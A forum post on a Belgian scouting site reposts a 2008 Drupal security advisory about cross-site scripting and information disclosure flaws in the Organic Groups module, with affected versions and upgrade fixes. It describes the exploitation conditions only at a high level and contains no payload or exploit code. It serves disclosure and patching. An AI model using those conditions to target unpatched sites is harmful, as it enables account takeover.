Scoutnet vzw

We connect scouts!
Het is momenteel 19 Mrt 2024 4:59

Alle tijden zijn UTC + 1 uur




Plaats een nieuw onderwerp Reageren op dit onderwerp  [ 1 bericht ] 
Auteur Bericht
BerichtGeplaatst: 02 Jul 2008 23:05 
Offline
Site Admin
Site Admin
Gebruikers-avatar

Geregistreerd: 17 Jul 2002 23:00
Berichten: 1522
Woonplaats: Wetteren
------------SA-2008-040 - ORGANIC GROUPS - CROSS SITE SCRIPTING AND INFORMATION DISCLOSURE------------

* Advisory ID: DRUPAL-SA-2008-040
* Project: Organic Groups (third-party module)
* Versions: 5.x and 6.x
* Date: 2008-July-02
* Security risk: Less Critical
* Exploitable from: Remote
* Vulnerability: Cross site scripting and information disclosure

------------DESCRIPTION------------

Organic groups enables users to create and manage their own 'groups'. Each group can be subscribed to, and includes a group home page where subscribers can communicate amongst themselves. Two vulnerabilities were found in the module.

Cross Site Scripting

The module displays certain values without appropriate filtering. Malicious group owners are able to exploit this issue and insert arbitrary HTML and script code into pages. Such a cross site scripting [ http://en.wikipedia.org/wiki/Cross-site_scripting ](XSS) attack may lead to administrator access for the malicious user.

Prerequisites:

* Audience check boxes must be disabled (enabled by default).
* Site must allow untrusted users to create groups.
* Malicious group owner must convince others to join his group.
* Users may be attacked if they try to start a new discussion in the group (not a comment).

Information Disclosure

Malicious users may discover the title of private groups. Other group details and the contents of private posts are not compromised.

Prerequisites:

* OG Access module must be enabled.
* Site must use the private groups feature.

------------VERSIONS AFFECTED------------

* Versions of Organic groups for Drupal 5.x prior to 5.x-7.3
* Versions of Organic groups for Drupal 6.x prior to 6.x-1.0-RC1

Drupal core is not affected. If you do not use the Organic groups module, there
is nothing you need to do.

------------SOLUTION------------

Install the latest version and run update.php:

* If you use Organic groups for Drupal 5.x upgrade to Organic groups 5.x-7.3 [ http://drupal.org/node/277854 ]
* If you use Organic groups for Drupal 6.x upgrade to Organic groups 6.x-1.0-RC1 [ http://drupal.org/node/277869 ]

Also see the Organic groups project page [ http://drupal.org/project/og ].

------------REPORTED BY------------

* Cross site scripting by fago [ http://drupal.org/user/16747 ].
* Information disclosure by John Forsythe [ http://drupal.org/user/101901 ].

------------CONTACT------------

The security contact for Drupal can be reached at security at drupal.org or via the form at [ http://drupal.org/contact ] and by selecting the security issues category.


Omhoog
 Profiel  
 
Berichten weergeven van de afgelopen:  Sorteer op  
Plaats een nieuw onderwerp Reageren op dit onderwerp  [ 1 bericht ] 

Alle tijden zijn UTC + 1 uur


Wie is er online?

Gebruikers in dit forum: Geen geregistreerde gebruikers en 2 gasten


U mag geen nieuwe onderwerpen plaatsen in dit forum
U mag geen reacties plaatsen op onderwerpen in dit forum
U mag uw berichten niet wijzigen in dit forum
U mag uw berichten niet verwijderen in dit forum
U mag geen bijlagen plaatsen in dit forum

Zoeken naar:
Ga naar:  
cron
Powered by phpBB® Forum Software © phpBB Group
Vertaald door phpBBservice.nl.